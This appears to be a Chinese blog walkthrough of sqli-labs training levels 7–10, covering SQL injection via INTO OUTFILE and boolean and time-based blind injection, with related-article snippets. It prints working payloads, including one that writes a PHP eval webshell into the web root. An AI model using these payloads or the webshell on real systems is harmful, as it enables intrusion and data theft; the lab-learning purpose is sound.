Sqli-labs--Less7-10

最新推荐文章于 2024-06-09 15:52:11 发布
最新推荐文章于 2024-06-09 15:52:11 发布
阅读量605 收藏
点赞数
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bt517840374/article/details/80409725
版权

Less 7 Dump into outfile

第七关,通过注入导出文件,一句话木马。
需要知道的是根目录,以及mysql中my.ini文件中的secure_file_priv,没有的话可以在my.ini中直接加入,有了这个才能导出。
payload : 

http://127.0.0.1/sqli-labs/Less-7/index.php?id=-1'))Union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile 'D:\\phpStudy\\WWW\\wuyun\\sqli-labs\\Less-7\\yijuhua.php'--+

这里写图片描述
这里写图片描述

通过菜刀直接get webshell

Less 8 GET-Blind-Boolian Based-single Quotes

Blind SQL (盲注) 是注入攻击的其中一种, 向数据库发送 true 或 false 这样的问题, 并根据应用程序返回的信息判断结果. 这种攻击的出现是因为应用程序配置为只显示常规错误, 但并没有解决SQL 注入存在的代码问题.

当攻击者利用SQL注入漏洞进行攻击时, 有时候web应用程序会显示, 后端数据库执行SQL查询返回的错误信息. Blind SQL (盲注)与常规注入很接近, 不同的是数据库返回数据的检索方式. 若数据库没有输出数据到web页面, 攻击者会询问一些列的 true 或 false 问题, 强制从数据库获取数据. 这样做让数据注入攻击变得困难, 但并不是不可能.

盲注常分为: 【基于布尔型的盲注】【基于时间的盲注】.

第八关是基于布尔型的盲注。

select length(databse());
select substr(databse(),1,1);
select ascii(substr(database(),1,1));
select ascii(substr(database(),1,1)) > N;
select ascii(substr(database(),1,1)) = N;
select ascii(substr(database(),1,1)) < N;
==需要补充的额外知识======

length(str):返回str字符串的长度。
substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len):跟上面的一样,截取字符串
ascii(str):返回字符串str的最左面字符的ASCII代码值。
ord(str):同上,返回ascii码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0
常见的ASCII,A:65,Z:90 a:97,z:122, 0:48, 9:57

=====================
这些都是精华,通过ascii字符编码来盲注。
http://127.0.0.1/sqli-labs/Less-8/?id=1%27%20and%20(ascii(substr((select%20database()),3,1)))=99%20%23
可以通过大于号和等于号来判断它ascii字符集数字为多少,然后慢慢的盲注出来。
上面说明它的ascii码为99,它是第三个字符,所以数据库的第三个字符为‘c’。
利用的就是上面的精华。
这里写图片描述
一步一步的将数据库名盲住出来,security。

然后我还是不知道如何将表爆出来,有点懵懵的。
可能需要sql语句吧。

Less 9 GET-Blind-Boolian/time Based-Single quotes

第九关,基于时间的GET单引号盲注。
用到了if()语句。
payload:http://localhost/sqli-labs/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23

http://localhost/sqli-labs/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23

判断数据库名的第一个字母为s(ascii为115),判断错误的话是暂停5秒

那么这里为什么必须基于时间呢,因为你怎么输入,输出结果都是You are in ,这就必须通过时间来判断了
这里写图片描述
无论正确或错误,都是输出的You are in………..
基于时间的盲注就是通过时间注入的,如果它是错误的,将通过睡眠5秒来识别。

Less 10 GET-Blind-Time based-double quotes

第十关,基于双引号的盲注。
就是将第九关的单引号变成双引号就行了。

今天是黑客情人节,祝大家早日找到幸福。这里写图片描述

小人物哎
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs Less7
orchid_sea的博客
07-24 1245
这里还有一个需要了解的点就是在mysql5.5版本之前secure_file_priv这个值是默认为空的,那么我们拿到的webshell如果对应的mysql数据库版本在5.5以下的话操作起来就比较方便,在mysql5.5版本之后secure_file_priv这个值是默认为NULL的,即不能够往数据库内写入文件。/tmp的意思是只能在/tmp目录下写入文件,这种情况下就需要考虑写入文件到文件夹后能否在网页上访问连接到这个目录,在MYSQL的bin目录下进入cmd,查看MySQL的权限设置。...
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
最新发布
Superstacks超全栈
06-09 388
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
Sqli-labs less-01
weixin_47075747的博客
12-12 540
Sqli-labs less-01 mysql 基本用法 查库:select schema_name from information_schema.schemata; 查表:select table_name from information_schema.tables where table_schema='security';
sqli-labs--Less7
m0_60829468的博客
10-22 2262
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基
sqli-labs:less-7
羽的博客
07-14 311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
Sqli-labs Less8
orchid_sea的博客
10-16 1034
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
SQLi-LABS的Less2分析
haoahaoahaoahao的博客
01-15 449
那么在mysql数据库有一个数据库information_schema那么这数据库有4个表分别是 schema_privileges,schemata,tables,columns。在id= 1的时候没报语法错误,那么猜测这存在sql注入漏洞,大概查询语句为select * from where id = 1 limit 0.1。知道id= 1没报错后那么我们使用order by命令看看这表的列数有几列吧,那么输入?id=1 order by 2 --+ 的时候报错了,说明这列数为3。
SQLI-LABS Less-7 到 Less-8
Web学习之路
03-20 270
布尔盲注
sqli-labs之less1
giun的博客
01-05 345
在看别人的博客的基础上自己加了些修改 sql-labs之less1 打开题目我们可以看到这样的界面 一、我们先尝试下看是不是get获取请求方式。 在地址栏后面加上?id=1;发现结果是我们所预料的get方式。 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 二、在http://127.0.0.1/sqli-labs-master/Less-1/?i...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1252
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqli-labs第十一关
小人物的博客
06-10 4395
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqli-labs第十三关--十五关
小人物的博客
06-18 3262
第十三关 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
mysql my.ini
小人物的博客
08-29 1113
Mysql my.ini [client] #设置mysql客户端默认字符集 default-character-set=utf8 [mysql] # 设置mysql客户端默认字符集 default-character-set=utf8 user = 'root' password = '123' [mysqld] #设置3306端口 port = 3306 # 设置mysql的安装目录...
MySQL注入实战指南——Sqli-labs教程解析
- **Less-1 至 Less-16** 涉及一系列逐步增加难度的练习,如识别注入点、利用错误信息、基本的SQL命令执行等。 4. **第二部分:Advanced Injection** 进阶部分介绍了更复杂的注入技术,如: - **Background-6** ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值